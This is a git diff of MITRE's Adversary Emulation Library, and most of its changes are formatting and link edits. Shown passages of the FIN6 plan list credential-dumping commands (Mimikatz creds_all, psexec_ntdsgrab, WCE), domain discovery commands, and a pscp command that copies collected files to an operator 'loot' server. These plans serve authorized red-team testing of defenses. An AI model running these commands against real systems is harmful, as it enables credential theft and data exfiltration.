diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index 021a2ca0..04d93e3b 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -2,7 +2,7 @@
 
 ## How to contribute
 
-Thanks for contributing to the FIN6 Adversary Emulation Plan!
+Thanks for contributing to the Adversary Emulation Library!
 
 You are welcome to comment on issues, open new issues, and open pull requests.
 
@@ -11,9 +11,9 @@ Pull requests should target the **[develop](https://github.com/center-for-threat
 Also, if you contribute any source code, we need you to agree to the following Developer's Certificate of Origin below.
 
 ## Reporting issues with emulation procedures
-  
+
 * Describe (in detail) what should have happened. Include any supporting information that may be helpful in resolving the issue.
-  
+
 * Be sure to include any steps to replicate the issue.
 
 ## Developer's Certificate of Origin v1.1
diff --git a/README.md b/README.md
index 33251f88..f005d47d 100644
--- a/README.md
+++ b/README.md
@@ -7,12 +7,12 @@ Also see our recent blog on the [Adversary Emulation Library](https://medium.com
 Available adversary emulation plans are listed below:
 
 | Emulation Plan | Intelligence Summary |
-|------|------|
+|:-----:|------|
 | [FIN6](/fin6/) | [FIN6 is thought to be a financially motivated cyber-crime group. The group has aggressively targeted and compromised high-volume POS systems in the hospitality and retail sectors since at least 2015...](/fin6/Intelligence_Summary.md) |
 | [APT29](/apt29/) | [APT29 is thought to be an organized and well-resourced cyber threat actor whose collection objectives appear to align with the interests of the Russian Federation...](/apt29/Intelligence_Summary.md) |
+| [menuPass](/menuPass/) | [menuPass is thought to be threat group motivated by collection objectives, with targeting that is consistent with Chinese strategic objectives...](/menuPass/Intelligence_Summary.md) |
 
-
-## Philosophy 
+## Philosophy
 
 These adversary emulation plans are based on known-adversary behaviors and designed to empower red teams to manually emulate a specific threat actor in order to test and evaluate defensive capabilities from a threat-informed perspective. This approach empowers defenders to operationalize cyber threat intelligence to better understand and combat real-world adversaries. Rather than focusing on static signatures, these intelligence-driven emulation plans provide a repeatable means to test and tune defensive capabilities and products against the evolving Tactics, Techniques, and Procedures (TTPs) of threat actors and malware.
 
@@ -34,11 +34,11 @@ In summary, each emulation plan should be perceived as input to an offensive ass
 
 Each emulation plan focuses on a specific named threat actor. The README of each individual plan provides a curated summary of available cyber threat intelligence, composed of an intelligence overview of the actor (describing who they target, how, and why where possible) as well as the scope of their activity (i.e. breadth of techniques and malware used). All presented information is cited back to relevant publicly available cyber threat intelligence and communicated and annotated via [ATT&CK](https://attack.mitre.org/).
 
-Within each emulation plan, the operational flow provides a high-level summary of the captured scenario(s). These scenarios will vary based on the adversary and available intelligence, but typically follow a sequential progression of how the actor breaches then works towards achieving their operational objectives within a victim environment (espionage, data/system destruction, etc.). 
+Within each emulation plan, the operational flow provides a high-level summary of the captured scenario(s). These scenarios will vary based on the adversary and available intelligence, but typically follow a sequential progression of how the actor breaches then works towards achieving their operational objectives within a victim environment (espionage, data/system destruction, etc.).
 
 The content to execute the scenario(s) is broken down into step-by-step procedures provided in both human and machine-readable formats. Scenarios can be executed end-to-end or as individual tests. The human-readable formats provide additional relevant background where possible as well as any setup prerequisites, while the machine-readable format is designed to be programmatically parsed (ex: read, reformatted, and ingested into an automated agent, such as [CALDERA](https://github.com/mitre/caldera) and/or breach simulation frameworks).
 
-Detailed documenation for our emulation plan structure can be found [here.](/emulation_plan_structure.md) 
+Detailed documenation for our emulation plan structure can be found [here.](/structure/emulation_plan_structure.md)
 
 ## Future Work
 
@@ -50,14 +50,13 @@ Please submit issues for any technical questions/concerns or contact ctid@mitre-
 
 Also see the guidance for contributors if are interested in [contributing.](/CONTRIBUTING.md)
 
-
 ## Liability / Responsible Usage
 
 This content is only to be used with appropriate prior, explicit authorization for the purposes of assessing security posture and/or research.
 
 ## Notice
 
-Copyright 2020 MITRE Engenuity. Approved for public release. Document number CT0005
+Copyright 2020-2021 MITRE Engenuity. Approved for public release. Document number CT0005
 
 Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
 
diff --git a/apt29/CHANGE_LOG.md b/apt29/CHANGE_LOG.md
index 30456160..64e759b9 100644
--- a/apt29/CHANGE_LOG.md
+++ b/apt29/CHANGE_LOG.md
@@ -3,6 +3,7 @@
 ## APT29 Emulation Plan
 
 |Version | Date | Change Details |
-|:--- |:---|:---|
-0.1 | April 2020 | ATT&CK Evaluations Release
-1.0 | January 2021 | Adversary Emulation Library Release
+|:---|:---|:---|
+| 0.1 | 21 April 2020 | ATT&CK Evaluations Release
+| 1.0 | 21 January 2021 | Adversary Emulation Library Release
+
diff --git a/apt29/Emulation_Plan/README.md b/apt29/Emulation_Plan/README.md
index 38e966e2..6d30ef30 100644
--- a/apt29/Emulation_Plan/README.md
+++ b/apt29/Emulation_Plan/README.md
@@ -31,7 +31,7 @@ We would like to formally thank the people that contributed to the content, revi
   - [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
   - [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
   - [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
-  - [YAML](/apt29/Emulation_Plan/APT29.yaml)
+  - [YAML](/apt29/Emulation_Plan/yaml)
 - [Archive](/apt29/Archive)
 - [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
 - [Change Log](/apt29/CHANGE_LOG.md)
diff --git a/apt29/Emulation_Plan/Scenario_1/Infrastructure.md b/apt29/Emulation_Plan/Scenario_1/Infrastructure.md
index d3e29973..1faa98df 100644
--- a/apt29/Emulation_Plan/Scenario_1/Infrastructure.md
+++ b/apt29/Emulation_Plan/Scenario_1/Infrastructure.md
@@ -119,7 +119,7 @@ Import-PfxCertificate -Exportable -FilePath "shockwave.local.pfx" -CertStoreLoca
   - [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
   - [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
   - [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
-  - [YAML](/apt29/Emulation_Plan/APT29.yaml)
+  - [YAML](/apt29/Emulation_Plan/yaml)
 - [Archive](/apt29/Archive)
 - [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
 - [Change Log](/apt29/CHANGE_LOG.md)
diff --git a/apt29/Emulation_Plan/Scenario_1/README.md b/apt29/Emulation_Plan/Scenario_1/README.md
index 8c55f2a5..c2b15071 100644
--- a/apt29/Emulation_Plan/Scenario_1/README.md
+++ b/apt29/Emulation_Plan/Scenario_1/README.md
@@ -545,7 +545,7 @@ Trigger the Startup Folder persistence by logging in to Windows victim 1
   - [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
   - [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
   - [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
-  - [YAML](/apt29/Emulation_Plan/APT29.yaml)
+  - [YAML](/apt29/Emulation_Plan/yaml)
 - [Archive](/apt29/Archive)
 - [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
 - [Change Log](/apt29/CHANGE_LOG.md)
diff --git a/apt29/Emulation_Plan/Scenario_2/Infrastructure.md b/apt29/Emulation_Plan/Scenario_2/Infrastructure.md
index 54629e83..4b92b862 100644
--- a/apt29/Emulation_Plan/Scenario_2/Infrastructure.md
+++ b/apt29/Emulation_Plan/Scenario_2/Infrastructure.md
@@ -96,7 +96,7 @@ We hope to capture the general structure of what is reported to have been seen b
   - [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
   - [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
   - [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
-  - [YAML](/apt29/Emulation_Plan/APT29.yaml)
+  - [YAML](/apt29/Emulation_Plan/yaml)
 - [Archive](/apt29/Archive)
 - [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
 - [Change Log](/apt29/CHANGE_LOG.md)
diff --git a/apt29/Emulation_Plan/Scenario_2/README.md b/apt29/Emulation_Plan/Scenario_2/README.md
index 906ec033..899ac62e 100644
--- a/apt29/Emulation_Plan/Scenario_2/README.md
+++ b/apt29/Emulation_Plan/Scenario_2/README.md
@@ -360,7 +360,7 @@ The original victim is rebooted and the legitimate user logs in, emulating ordin
   - [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
   - [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
   - [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
-  - [YAML](/apt29/Emulation_Plan/APT29.yaml)
+  - [YAML](/apt29/Emulation_Plan/yaml)
 - [Archive](/apt29/Archive)
 - [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
 - [Change Log](/apt29/CHANGE_LOG.md)
diff --git a/apt29/Emulation_Plan/APT29.yaml b/apt29/Emulation_Plan/yaml/APT29.yaml
similarity index 99%
rename from apt29/Emulation_Plan/APT29.yaml
rename to apt29/Emulation_Plan/yaml/APT29.yaml
index a882fe8c..4bb0e7e2 100644
--- a/apt29/Emulation_Plan/APT29.yaml
+++ b/apt29/Emulation_Plan/yaml/APT29.yaml
@@ -2,7 +2,7 @@
 
 - emulation_plan_details:
     id: 4975696e-1d41-11eb-adc1-0242ac120002
-    adversary_name: APT29 Adversary Emulation Plan
+    adversary_name: APT29
     adversary_description: APT29 is a threat group that has been attributed to the Russian government who have been in operation since at least 2008. This group reportedly compromised the Democratic National Committee starting in the summer of 2015.
     attack_version: 8.1
     format_version: 1.0
diff --git a/apt29/Emulation_Plan/yaml/README.md b/apt29/Emulation_Plan/yaml/README.md
new file mode 100644
index 00000000..d95e43ad
--- /dev/null
+++ b/apt29/Emulation_Plan/yaml/README.md
@@ -0,0 +1,27 @@
+# Machine-Readable APT29 Emulation Plans
+
+The universal, technology-agnostic version of the APT29 emulation plan YAML has been provided as starting point for machine parsing and execution of the APT29 emulation plan. This folder will store all versions of this yaml file, including those formatted to work with specific execution runners (such as automated agents like [CALDERA](https://github.com/mitre/caldera) or other breach simulation frameworks).
+
+## Included Formats
+
+As new files are added, please list them in the below table.
+
+| File | Execution Framework | Notes |
+| --- | --- | --- |
+| [APT29.yaml](/apt29/Emulation_Plan/yaml/APT29.yaml) | N/A | Initial Emulation Plan YAML |
+
+---
+
+## Additional Plan Resources
+
+- [Intelligence Summary](/apt29/Intelligence_Summary.md)
+- [Operations Flow](/apt29/Operations_Flow.md)
+- [Emulation Plan](/apt29/Emulation_Plan/README.md)
+  - [Scenario 1 - Infrastructure](/apt29/Emulation_Plan/Scenario_1/Infrastructure.md)
+  - [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
+  - [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
+  - [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
+  - [YAML](/apt29/Emulation_Plan/yaml)
+- [Archive](/apt29/Archive)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/apt29/CHANGE_LOG.md)
diff --git a/apt29/Intelligence_Summary.md b/apt29/Intelligence_Summary.md
index 24c53af9..a2b08c3c 100644
--- a/apt29/Intelligence_Summary.md
+++ b/apt29/Intelligence_Summary.md
@@ -147,7 +147,7 @@ ID | Source | Publisher | Date |
   - [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
   - [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
   - [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
-  - [YAML](/apt29/Emulation_Plan/APT29.yaml)
+  - [YAML](/apt29/Emulation_Plan/yaml)
 - [Archive](/apt29/Archive)
 - [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
 - [Change Log](/apt29/CHANGE_LOG.md)
diff --git a/apt29/NOTICE.txt b/apt29/NOTICE.txt
index 1a097f3a..837a3fd1 100644
--- a/apt29/NOTICE.txt
+++ b/apt29/NOTICE.txt
@@ -1,4 +1,4 @@
-Copyright 2020 MITRE Engenuity. Approved for public release. Document number AT0008.
+Copyright 2021 MITRE Engenuity. Approved for public release. Document number AT0008.
 
 Licensed under the Apache License, Version 2.0 (the "License");
 you may not use this file except in compliance with the License.
diff --git a/apt29/Operations_Flow.md b/apt29/Operations_Flow.md
index cd236227..2022ea28 100644
--- a/apt29/Operations_Flow.md
+++ b/apt29/Operations_Flow.md
@@ -37,7 +37,7 @@ The content to execute this scenario was tested and developed using PoshC2 and o
   - [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
   - [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
   - [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
-  - [YAML](/apt29/Emulation_Plan/APT29.yaml)
+  - [YAML](/apt29/Emulation_Plan/yaml)
 - [Archive](/apt29/Archive)
 - [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
 - [Change Log](/apt29/CHANGE_LOG.md)
diff --git a/apt29/README.md b/apt29/README.md
index 383073a9..3fe02bc3 100644
--- a/apt29/README.md
+++ b/apt29/README.md
@@ -31,7 +31,7 @@ We would like to formally thank the people that contributed to the content, revi
   - [Scenario 1](/apt29/Emulation_Plan/Scenario_1/README.md)
   - [Scenario 2 - Infrastructure](/apt29/Emulation_Plan/Scenario_2/Infrastructure.md)
   - [Scenario 2](/apt29/Emulation_Plan/Scenario_2/README.md)
-  - [YAML](/apt29/Emulation_Plan/APT29.yaml)
+  - [YAML](/apt29/Emulation_Plan/yaml)
 - [Archive](/apt29/Archive)
 - [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
 - [Change Log](/apt29/CHANGE_LOG.md)
@@ -42,7 +42,7 @@ This content is only to be used with appropriate prior, explicit authorization f
 
 ## Notice
 
-Copyright 2020 MITRE Engenuity. Approved for public release. Document number AT0008.
+Copyright 2021 MITRE Engenuity. Approved for public release. Document number AT0008.
 
 Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
 
diff --git a/changelog.md b/changelog.md
deleted file mode 100644
index cf074e46..00000000
--- a/changelog.md
+++ /dev/null
@@ -1,3 +0,0 @@
-**Current version: v1.0**
-
-No changes yet!
diff --git a/fin6/CHANGE_LOG.md b/fin6/CHANGE_LOG.md
index 131425a1..ad02f727 100644
--- a/fin6/CHANGE_LOG.md
+++ b/fin6/CHANGE_LOG.md
@@ -2,6 +2,6 @@
 
 ## FIN6 Emulation Plan
 
-Version | Date | Change Details |
---- | --- | --- |
-1.0 | 15 September 2020 | Initial Release
+|Version | Date | Change Details |
+|:---|:---|:---|
+| 1.0 | 15 September 2020 | Adversary Emulation Library Release |
diff --git a/fin6/Emulation_Plan/Infrastructure.md b/fin6/Emulation_Plan/Infrastructure.md
index 378cb6a7..ccdc2969 100644
--- a/fin6/Emulation_Plan/Infrastructure.md
+++ b/fin6/Emulation_Plan/Infrastructure.md
@@ -2,10 +2,12 @@
 
 FIN6 infrastructure is likely comprised of distributed command and control (C2) servers and exfiltration servers.  FIN6 is reported to have conducted C2 over HTTPS.  As such, it would be wise to purchase, associate, and categorize a domain for each redirector.  [Let's Encrypt](https://letsencrypt.org) is a resource for free SSL/TLS certificates.
 
-FIN6 uses separate servers for exfiltration.  They appear to purchase domain names that are similar/relevent to their target organization in order to blend in.  The group may very well use one server to exfiltrate Discovery data during Phase 1, and separate servers to exfiltrate PoS or payment data during Phase 2.  Specific server configuration very much depends on the C2 framework.  
+FIN6 uses separate servers for exfiltration.  They appear to purchase domain names that are similar/relevent to their target organization in order to blend in.  The group may very well use one server to exfiltrate Discovery data during Phase 1, and separate servers to exfiltrate PoS or payment data during Phase 2.  Specific server configuration very much depends on the C2 framework.
 
 Detailing specific infrastructure configuration is beyond the scope of this plan.  Please consult the following resources:
 
+---
+
 ## Infrastructure Configuration
 
 * [Cloud-based Redirectors for Distributed Hacking](https://blog.cobaltstrike.com/2014/14/cloud-based-redirectors-for-distributed-hacking/)
@@ -14,6 +16,8 @@ Detailing specific infrastructure configuration is beyond the scope of this plan
 * [Red Team Infrastructure Wiki](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki)
 * [A Deep Dive into Cobalt Strike Malleable C2](https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b)
 
+---
+
 ## Emulation Team Systems and Tools
 
 The following represents a bare minimum but should be operationally representative of FIN6 infrastructure and toolset:
@@ -57,4 +61,18 @@ The following represents a bare minimum but should be operationally representati
 
 * ### Phase 2 - E-Commerce Exfiltration
 
-  * HTTP - FIN6 is reported to have exfiltrated payment data resulting from it's Magecart Group 6 activity via HTTP POST.<sup>[10](https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/)</sup> In order to emulate this use case (Phase 2 Scenario 2), you will need to set up an exfiltration server capable of receiving HTTP POST requests.  Depending on how you intend to evaluate this scenario, a lightweight solution like Python's http.server may be appropriate.  This activity is further described in Phase 2.
\ No newline at end of file
+  * HTTP - FIN6 is reported to have exfiltrated payment data resulting from it's Magecart Group 6 activity via HTTP POST.<sup>[10](https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/)</sup> In order to emulate this use case (Phase 2 Scenario 2), you will need to set up an exfiltration server capable of receiving HTTP POST requests.  Depending on how you intend to evaluate this scenario, a lightweight solution like Python's http.server may be appropriate.  This activity is further described in Phase 2.
+
+---
+
+## Additional Plan Resources
+
+* [Intelligence Summary](/fin6/Intelligence_Summary.md)
+* [Operations Flow](/fin6/Operations_Flow.md)
+* [Emulation Plan](/fin6/Emulation_Plan/README.md)
+  - [Infrastructure](/fin6/Emulation_Plan/Infrastructure.md)
+  - [Phase 1](/fin6/Emulation_Plan/Phase1.md)
+  - [Phase 2](/fin6/Emulation_Plan/Phase2.md)
+  - [YAML](/fin6/Emulation_Plan/yaml)
+* [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+* [Change Log](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/CHANGE_LOG.md)
diff --git a/fin6/Emulation_Plan/Phase1.md b/fin6/Emulation_Plan/Phase1.md
index a8c9923a..937d1685 100644
--- a/fin6/Emulation_Plan/Phase1.md
+++ b/fin6/Emulation_Plan/Phase1.md
@@ -28,7 +28,7 @@ Phase 1 is the pursuit of enabling objectives.  Phase 2, the operational effects
 
 As FIN6 appears to be monetarily motivated, they take a pragmatic approach toward delivery.  FIN6 has employed social engineering ala direct messages on LinkedIn, spear-phished, compromised e-commerce sites, and it has been suggested that they have negotiated or even purchased access to previously compromised networks.<sup>[4](https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html)</sup> <sup>[5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24)</sup> <sup>[7](https://blog.morphisec.com/new-global-attack-on-point-of-sale-systems)</sup> <sup>[8](https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/)</sup> <sup>[11](https://proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers)</sup> It is therefore, recommended for the purpose of threat emulation, that assessors approach delivery in the same manner.
 
-For teams that intend to emulate the threat actor for every stage of the kill-chain and assess their organization’s ability to protect, as well as detect and respond it may be prudent to approach this step from a red team perspective.  Conduct reconnaissance and choose a method of delivery that has the highest likelihood of successful delivery and exploitation.  For teams that are primarily interested in assessing their organization’s ability to detect and respond to FIN6 activity, it may not be worth the investment of resources.  For these assessors, it is recommended that you assume breach using the C2 framework of your choice.  FIN6 has made use of CobaltStrike and Metasploit.  Koadic C2 may be a good option to emulate the more_eggs implant.  
+For teams that intend to emulate the threat actor for every stage of the kill-chain and assess their organization’s ability to protect, as well as detect and respond it may be prudent to approach this step from a red team perspective.  Conduct reconnaissance and choose a method of delivery that has the highest likelihood of successful delivery and exploitation.  For teams that are primarily interested in assessing their organization’s ability to detect and respond to FIN6 activity, it may not be worth the investment of resources.  For these assessors, it is recommended that you assume breach using the C2 framework of your choice.  FIN6 has made use of CobaltStrike and Metasploit.  Koadic C2 may be a good option to emulate the more_eggs implant.
 
 ---
 
@@ -56,7 +56,7 @@ net user /domain > ad_users.txt
 
 #### 2.2 - Remote System Discovery ([T1018](https://attack.mitre.org/techniques/T1018/))
 
-Identify all computer objects and output the results to a text file. 
+Identify all computer objects and output the results to a text file.
 
 ##### FIN6 Procedure
 
@@ -88,7 +88,7 @@ Get-ADOrganizationalUnit -Filter 'Name -like "*"' | Format-Table Name, Distingui
 
 #### 2.4 - Domain Trust Discovery ([T1482](https://attack.mitre.org/techniques/T1482/))
 
-Performs a full forest search and dumps trust objects to a text file. 
+Performs a full forest search and dumps trust objects to a text file.
 
 ##### FIN6 Procedure
 
@@ -137,9 +137,9 @@ net group /domain > ad_group.txt
 
 ## Step 3 - FIN6 Privilege Escalation
 
-The third objective is to escalate privileges.  Again, in this regard, FIN6 has taken a pragmatic approach.  Reporting suggests the group has purchased credentials, made heavy use of credential access, and used the “getsystem” modules included in publicly available penetration testing frameworks.<sup>[4](https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html)</sup> <sup>[5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24)</sup> <sup>[7](https://blog.morphisec.com/new-global-attack-on-point-of-sale-systems)</sup> FIN6 has been reported to further compromise the Windows domain by copying and exfiltrating the Active Directory database (NTDS.dit) file.<sup>[3](https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf)</sup> The information therein enables the group to move freely throughout the domain and pursue their operational objectives.  
+The third objective is to escalate privileges.  Again, in this regard, FIN6 has taken a pragmatic approach.  Reporting suggests the group has purchased credentials, made heavy use of credential access, and used the “getsystem” modules included in publicly available penetration testing frameworks.<sup>[4](https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html)</sup> <sup>[5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24)</sup> <sup>[7](https://blog.morphisec.com/new-global-attack-on-point-of-sale-systems)</sup> FIN6 has been reported to further compromise the Windows domain by copying and exfiltrating the Active Directory database (NTDS.dit) file.<sup>[3](https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf)</sup> The information therein enables the group to move freely throughout the domain and pursue their operational objectives.
 
-Privilege escalation can be challenging, it is recommended that you choose your initial target for “compromise” carefully.  In the event that the assessing team is unable to escalate privileges, this event can be “white-carded” with the granting of administrative rights to the compromised account.  This white-carded event could enable the assessing team to escalate via credential access as the procedures described herein require elevated privileges.  
+Privilege escalation can be challenging, it is recommended that you choose your initial target for “compromise” carefully.  In the event that the assessing team is unable to escalate privileges, this event can be “white-carded” with the granting of administrative rights to the compromised account.  This white-carded event could enable the assessing team to escalate via credential access as the procedures described herein require elevated privileges.
 
 ### Procedures
 
@@ -171,7 +171,7 @@ Example: Get-System -ServiceName 'mstdc' -PipeName 'mstdc'
 
 ##### Meterpreter/Mimikatz
 
-Reporting indicates that FIN6 has used Mimikatz on several occasions.<sup>[7](https://blog.morphisec.com/new-global-attack-on-point-of-sale-systems)</sup> <sup>[8](https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/)</sup> <sup>[9](https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/)</sup> While there are many variations of the tool, FIN6 has to date, favored the use of Metasploit and CobaltStrike for post-exploitation.<sup>[4](https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html)</sup> <sup>[5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24)</sup> <sup>[7](https://blog.morphisec.com/new-global-attack-on-point-of-sale-systems)</sup> <sup>[8](https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/)</sup> <sup>[9](https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/)</sup>  As such, the recommended procedure specifies using Mimikatz from a Meterpreter session.  This of course, requires a Meterpreter session and elevated privileges.  The commands below load Mimikatz into memory and attempt to retrieve wdigest credentials.  
+Reporting indicates that FIN6 has used Mimikatz on several occasions.<sup>[7](https://blog.morphisec.com/new-global-attack-on-point-of-sale-systems)</sup> <sup>[8](https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/)</sup> <sup>[9](https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/)</sup> While there are many variations of the tool, FIN6 has to date, favored the use of Metasploit and CobaltStrike for post-exploitation.<sup>[4](https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html)</sup> <sup>[5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24)</sup> <sup>[7](https://blog.morphisec.com/new-global-attack-on-point-of-sale-systems)</sup> <sup>[8](https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/)</sup> <sup>[9](https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/)</sup>  As such, the recommended procedure specifies using Mimikatz from a Meterpreter session.  This of course, requires a Meterpreter session and elevated privileges.  The commands below load Mimikatz into memory and attempt to retrieve wdigest credentials.
 
 ##### FIN6 Procedure
 
@@ -184,9 +184,9 @@ meterpreter> creds_all
 
 ##### Metasploit ntdsgrab
 
-Another technique reportedly used by FIN6 to achieve credential access and escalate privileges is to copy and exfiltrate the Active Directory NTDS.dit file.<sup>[3](https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf)</sup> <sup>[5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24)</sup>  Reporting indicates that on at least one occasion, the group is believed to have used Metasploit's psexec_ntdsgrab module.  This module authenticates to the domain controller, creates a volume shadow copy of the system drive, and downloads copies of the NTDS.dit and SYSTEM hive. Although this technique is herein classified as a privilege escalation technique, the group may execute this module during discovery and exfiltrate the resultant files with the rest of their discovery results.<sup>[5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24)</sup>  
+Another technique reportedly used by FIN6 to achieve credential access and escalate privileges is to copy and exfiltrate the Active Directory NTDS.dit file.<sup>[3](https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf)</sup> <sup>[5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24)</sup>  Reporting indicates that on at least one occasion, the group is believed to have used Metasploit's psexec_ntdsgrab module.  This module authenticates to the domain controller, creates a volume shadow copy of the system drive, and downloads copies of the NTDS.dit and SYSTEM hive. Although this technique is herein classified as a privilege escalation technique, the group may execute this module during discovery and exfiltrate the resultant files with the rest of their discovery results.<sup>[5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24)</sup>
 
-Hashes must be retrieved from the NTDS.dit file.  There are a number of openly available tools that are capable of parsing this file, [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) is one such tool.  As this step is done locally and offline, the choice is left to the analyst.  
+Hashes must be retrieved from the NTDS.dit file.  There are a number of openly available tools that are capable of parsing this file, [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) is one such tool.  As this step is done locally and offline, the choice is left to the analyst.
 
 ##### FIN6 Procedure
 
@@ -198,7 +198,7 @@ msf> use auxiliary/admin/smb/psexec_ntdsgrab
 
 ##### Windows Credential Editor
 
-In addition to Mimikatz and psexec_ntdsgrab, FIN6 is reported to use WCE to access credentials.<sup>[3](https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf)</sup> <sup>[5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24)</sup>  The command below dumps cleartext passwords stored by the digest authentication package.  
+In addition to Mimikatz and psexec_ntdsgrab, FIN6 is reported to use WCE to access credentials.<sup>[3](https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf)</sup> <sup>[5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24)</sup>  The command below dumps cleartext passwords stored by the digest authentication package.
 
 ##### FIN6 Procedure
 
@@ -243,9 +243,17 @@ Example: C:\>plink -ssh root@192.168.101.1
 ```sh
 pscp -P {port} c:\windows\temp\ad_* root@192.168.101.1:/temp/loot
 ```
---- 
 
-## Next Steps
+---
 
-- [FIN6 Operations Flow](/fin6/Operations_Flow.md)
-- [FIN6 Phase 2](/fin6/Emulation_Plan/Phase2.md)
\ No newline at end of file
+## Additional Plan Resources
+
+* [Intelligence Summary](/fin6/Intelligence_Summary.md)
+* [Operations Flow](/fin6/Operations_Flow.md)
+* [Emulation Plan](/fin6/Emulation_Plan/README.md)
+  - [Infrastructure](/fin6/Emulation_Plan/Infrastructure.md)
+  - [Phase 1](/fin6/Emulation_Plan/Phase1.md)
+  - [Phase 2](/fin6/Emulation_Plan/Phase2.md)
+  - [YAML](/fin6/Emulation_Plan/yaml)
+* [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
